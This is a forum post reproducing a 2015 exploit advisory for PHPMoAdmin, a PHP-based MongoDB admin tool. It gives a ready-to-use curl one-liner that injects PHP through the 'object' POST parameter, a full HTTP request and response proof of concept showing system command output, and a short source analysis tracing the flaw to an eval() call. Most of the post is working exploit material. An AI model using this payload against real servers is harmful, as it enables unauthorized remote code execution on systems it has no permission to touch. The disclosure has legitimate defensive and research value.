Aerosol Posted March 4, 2015 Report Share Posted March 4, 2015 ####################################################################### _ ___ _ _ ____ ____ _ _____# | | / _ \| \ | |/ ___|/ ___| / \|_ _|# | | | | | | \| | | _| | / _ \ | |# | |__| |_| | |\ | |_| | |___ / ___ \| |# |_____\___/|_| \_|\____|\____/_/ \_\_|## PHPMoAdmin Unauthorized Remote Code Execution (0-Day)# Website : http://www.phpmoadmin.com/# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio# Release dates : March 3, 2015## Special Thanks to 2600 Thailand group# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/#########################################################################[+] Description============================================================PHPMoAdmin is a MongoDB administration tool for PHP built on astripped-down version of the Vork high-performance framework.[+] Exploit============================================================Someone was trying to sale this shit for 3000usd lolz$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"[+] Proof-of-Concept============================================================PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7POST /moadmin/moadmin.php HTTP/1.1Host: 192.168.33.10User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-alivePragma: no-cacheCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 34object=1;system('id;ls -lha');exitHTTP/1.1 200 OKDate: Tue, 03 Mar 2015 16:57:40 GMTServer: Apache/2.4.7 (Ubuntu)Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0,pre-check=0Pragma: no-cacheVary: Accept-EncodingContent-Length: 223Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmluid=33(www-data) gid=33(www-data) groups=33(www-data)total 116Kdrwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 .drwxr-xr-x 6 root root 4.0K Mar 3 16:17 ..-rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php[+] Vulnerability Analysis============================================================Filename: moadmin.php1. create new moadminComponent object1977: $mo = new moadminComponent;2. if the http-post parameter 'object' is set738: class moadminComponent {...762: public function __construct() {...786: if (isset($_POST['object'])) {787: if (self::$model->saveObject($_GET['collection'],$_POST['object'])) {...3. evaluate the value of 'object' as PHP code692: public function saveObject($collection, $obj) {693: eval('$obj=' . $obj . ';'); //cast from string to arraySource Quote Link to comment Share on other sites More sharing options...
kp112 Posted March 5, 2015 Report Share Posted March 5, 2015 Quote Link to comment Share on other sites More sharing options...